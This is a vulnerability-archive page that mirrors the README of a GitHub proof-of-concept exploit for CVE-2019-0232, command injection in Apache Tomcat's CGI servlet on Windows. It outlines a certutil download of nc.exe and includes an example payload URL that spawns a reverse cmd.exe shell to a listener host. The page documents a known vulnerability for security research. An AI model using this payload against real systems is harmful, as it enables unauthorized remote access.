Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-0232 PoC — Apache Tomcat 操作系统命令注入漏洞

Source
https://github.com/Dharan10/CVE-2019-0232
Associated Vulnerability
Title:Apache Tomcat 操作系统命令注入漏洞 (CVE-2019-0232)
Description:When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
Description
Hi this is a revised and enhanced code for CVE-2019-0232
Readme
# **Exploit for Apache Tomcat CVE-2019-0232**

This script exploits the **CVE-2019-0232** vulnerability in Apache Tomcat, which allows remote code execution through the improper handling of the `ism.bat` script. The script leverages a reverse shell technique using `certutil` and `nc.exe` (Netcat) to gain remote access to the vulnerable system.

### **Vulnerability Overview:**
- **CVE ID**: CVE-2019-0232
- **Affected Products**: Apache Tomcat 6.x, 7.x, 8.x, and 9.x
- **Description**: 
  - **CVE-2019-0232** is a vulnerability in Apache Tomcat’s handling of requests to `ism.bat` that could allow attackers to execute arbitrary commands on the server. This vulnerability occurs due to a lack of proper validation of user input, allowing attackers to trigger the execution of arbitrary commands through a specially crafted request.
  - The vulnerability can be exploited to download a malicious `nc.exe` file from a remote server and use it to spawn a reverse shell.

### **Requirements:**
- **Python 3**: The script is designed for Python 3.x.
- **Netcat**: A Netcat listener (`nc.exe`) must be hosted on a server for the reverse shell connection.
- **Apache Tomcat**: The target server must be running a vulnerable version of Apache Tomcat (6.x, 7.x, 8.x, or 9.x) that is susceptible to CVE-2019-0232.

### **How It Works:**
1. **Download `nc.exe`**: The script sends a crafted request to the vulnerable Tomcat server to download the `nc.exe` (Netcat) file to the target machine using `certutil`.
2. **Reverse Shell**: Once `nc.exe` is downloaded, another request is sent to execute the reverse shell command, which connects back to the attacker's Netcat listener.

### **Usage:**

#### 1. Clone the repository:
```bash
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
```
#### 2. Edit the script or run it with user inputs:
```bash
python3 exploit.py
```
#### 3. You will be prompted to enter the following details:
```bash 
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.
```
### Example:
```bash
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
```
Once executed successfully, you should have a reverse shell connection back to your Netcat listener.
### Disclaimer:
This script is intended for educational purposes only. Do not use it for malicious activities. Always obtain proper authorization before attempting any penetration testing or security auditing. Misuse of this script could result in legal consequences.

### Important Notes:
Ensure the Apache Tomcat server is not patched against CVE-2019-0232 before using this exploit.
The script may require administrative privileges depending on the target system's configuration.
#### Author:
Author: A!Z3N(Dharan)
Made with power!
### **License:**

This project is licensed under the **MIT License**. 

However, **use it at your own risk**. This code is provided for **educational purposes only**. By using this code, you agree to take full responsibility for any actions resulting from its use. Misuse or unauthorized use of this exploit may lead to legal consequences. **Always obtain proper authorization** before performing any security testing or penetration testing on any system.

You are free to use, modify, and distribute this code, but **only for ethical purposes**. The author is not responsible for any damage caused by this code. 

**Do not use this exploit without the explicit permission of the target system's owner.**
File Snapshot

 [4.0K]  /data/pocs/d075c5de4b07b2c7ce8d3433ea918162618dc2e9
├── [2.6K]  CVE-2019-0232.py
└── [3.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →